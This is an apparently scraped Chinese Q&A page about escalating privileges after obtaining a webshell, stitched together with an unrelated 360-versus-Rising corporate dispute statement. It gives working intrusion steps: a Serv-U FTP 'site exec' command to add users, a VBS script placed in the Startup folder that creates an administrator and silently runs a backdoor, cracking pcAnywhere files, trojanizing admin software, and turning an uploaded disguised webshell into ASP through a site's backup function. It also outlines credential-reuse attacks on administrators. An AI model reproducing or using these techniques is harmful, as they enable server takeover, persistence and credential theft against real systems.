pcanywhere提权,拿到WEBSHELL如何提权~
本文目录索引
- 1,拿到WEBSHELL如何提权~
- 2,webshell 提权 牛逼的来!
- 3,渗透的简单方法?
- 4,什么是网络渗透
- 5,拿站问题,拿到管理后台用户名和密码了,下来怎么办?拿WEBSHELL,和提权拿服务器吗?怎么拿,方法………
- 6,本地提权漏洞
1,拿到WEBSHELL如何提权~
说到花了九牛二虎的力气获得了一个webshell,
当然还想继续获得整个服务器的admin权限,正如不想得到admin的不是好黑客~
嘻嘻~~好跟我来,看看有什么可以利用的来提升权限
第一
如果服务器上有装了pcanywhere服务端,管理员为了管理方便
也给了我们方便,到系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就ok了
第二
有很多小黑问我这么把webshell的iis user权限提升
一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是servu
那么我们就利用servu来提升权限
通过servu提升权限需要servu安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个教本的作用是建立user用户密码为pass
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.
第三
就是先检查有什么系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如诺顿,VAdministrator,金山,瑞星,WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个批处理或者VBS,然后还是等待服务器重启。
第四
查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。
第五
使用Flashfxp也能提升权限,但是成功率就看你自己的运气了
首先找到FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是
2,webshell 提权 牛逼的来!
看看支不支持php,可以的话用phpudf提权,不能的话ws2help提权,有360的话360提权,或者su ftp提权,FileZilla Server ftp提权,找找网站的数据库密码,mssql,mymql提权,还可以下sam文件破解密码{一般不行},支持aspx的话穿一个aspx大马issspy,找一找可利用目录,ftp帐号,说不定用他就是管理员密码了
我也没有办法啊,可以执行cmd的话就可以本地提权,我也是菜鸟
3,渗透的简单方法?
先通过论坛,收集出管理员的用户名,管理员的邮箱,QQ,MSN等一些常见的信息等.
通过google定位到管理员曾经注册过的站,再把曾经注册过的站给日了,套出管理员注册时的密码.
然后再用这些密码来试dz的后台.最后拿下权限.总体思路无外乎这样....
这其间最多最多再加些小技巧在里面.
当你还留停在这种渗透手法的时候,个人建议,跳出这个思维,当你跳出这个思维的时候,你可能会发现
另外的渗透手法,掌握的话,国内90%以上的站,拿下都跑玩儿似的....
在去年的时候,国外也开始关注之种技术,他们给了个称号叫社交型网络攻击.
而这个技术,在中国的底下,称的上运用成熟的,估计已经有四五年了,据我所知的.
我这里简单介绍一下这种攻击模式:
首先,需要定位好哪些大型网络可以利用.国外的话,例如说myspace,facebook等.
就国内来说,我们不能以所谓的大型网络来区分,需要的是系统的划分.
ssn网络,如:xiaonei,kaixin001,douban等,门户网站:163,sina,sohu,qq等...门类型:技术类如:csdn,域名型:新网,万网等
4,什么是网络渗透
网络渗透是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为"渗透测试(Penetration Test)"。 无论是网络渗透(Network Penetration)还是渗透测试(Penetration Test),其实际上所指的都是同一内容,也就是研究如何一步步攻击入侵某个大型网络主机服务器群组。 只不过从实施的角度上看,前者是攻击者的恶意行为,而后者则是安全工作者模拟入侵攻击测试,进而寻找最佳安全防护方案的正当手段。 扩展资料 网络渗透攻击与普通攻击的不同: 网络渗透攻击与普通网络攻击的不同在于,普通的网络攻击只是单一类型的攻击。 例如,在普通的网络攻击事件中,攻击者可能仅仅是利用目标网络的Web服务器漏洞,入侵网站更改网页,或者在网页上挂马。也就是说,这种攻击是随机的,而其目的也是单一而简单的。 网络渗透攻击则与此不同,它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。 例如,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器,继续入侵目标网络,获取整个网络中所有主机的权限。 为了实现渗透攻击,攻击者采用的攻击方式绝不仅此于一种简单的Web脚本漏洞攻击。攻击者会综合运用远程溢出、木马攻击、密码破解、嗅探、ARP欺骗等多种攻击方式,逐步控制网络。 总体来说,与普通网络攻击相比,网络渗透攻击具有几个特性:攻击目的的明确性,攻击步骤的逐步与渐进性,攻击手段的多样性和综合性。
5,拿站问题,拿到管理后台用户名和密码了,下来怎么办?拿WEBSHELL,和提权拿服务器吗?怎么拿,方法………
如果后台有备份就简单了
备份有两行
记住刚才小马的地址比如uploadfile/1231232131.jpg
把这段复制到备份的第一行../database/213212-1231232.mdb
替换database/213212-1231232.mdb成uploadfile/1231232131.jpg
下一行写xxxx.asp
点备份
如果成功了的话 把得到的地址打到地址栏如果后缀是xxx.asp.asa
直接输入xxx.asp
就简单介绍下拿webshell
6,本地提权漏洞
楼主放心,那个不是后门,后门是非法的,瑞星要是真能抓到什么后门,早把人家告了,还用的着这样诽谤么 360 关于瑞星捏造“后门说”的严正声明 连日来,瑞星公司通过客户端、弹窗、论坛以及部分媒体陆续发布《免费杀毒软件黑幕:奇虎360给用户装“后门”》、《奇虎360利用“后门”拿走了用户什么?》,并通过媒体、论坛、视频网站等各种渠道,大肆传播这些扭曲事实、颠倒黑白的信息。 360公司恳请各位媒体,不要刊登瑞星公司捏造事实的稿件。360公司再度严正声明如下: 1 从昨日开始,北京市法院已经开庭审理瑞星公司千万元贿赂北京公安原网监处长于兵,制造冤案,陷害对手微点公司和刘旭案。北京各大媒体均进行了整版报道。瑞星是栽赃陷害案件的背后主谋。此次瑞星公司对360公司捏造事实、诽谤陷害,与此案如出一辙。 2 360公司已经就瑞星公司相关恶意诽谤行为向北京西城区人民法院提起诉讼。对于瑞星公司捏造360软件留有“后门”的谣言,360公司已经第一时间予以澄清,指出这是毫无根据的、性质极为恶劣的诽谤诋毁。 3 360公司已经向北京市公安机关报案,公安机关将就此展开刑事调查。 4 360旗下的360安全卫士、360杀毒等产品均已经过公安部严格检测,是国家许可发行的合法安全软件。艾瑞数据调查,360系列安全软件拥有超过3亿用户,用户量是瑞星的接近3倍,用户市场份额超过75%,是中国用户量最大的安全软件, 5 被瑞星造谣有“后门”的360程序,实际上是一种高端的反木马侦测、清除与修复 技术(Anti-rootkit)。它的作用是强力检测和清除木马、病毒,让使用内核技术的木马 (Rootkit)无处隐藏。这是一种在国际上比较领先的杀木马技术,在卡巴斯基、Avast、 趋势、Bitdefender、微点、江民等安全软件中都有相应的模块。而瑞星因为不懂这种最前沿的高级反木马技术,导致其杀毒软件杀木马的能力一直很弱。 6 众所周知,“漏洞”与“后门”是完全两个不同的概念。但瑞星公司故意将两者混淆。 如果按瑞星的逻辑推理,那么瑞星杀毒软件中光是波兰安全组织NT Internals披露的三 个漏洞就是三个巨大的超级“后门”。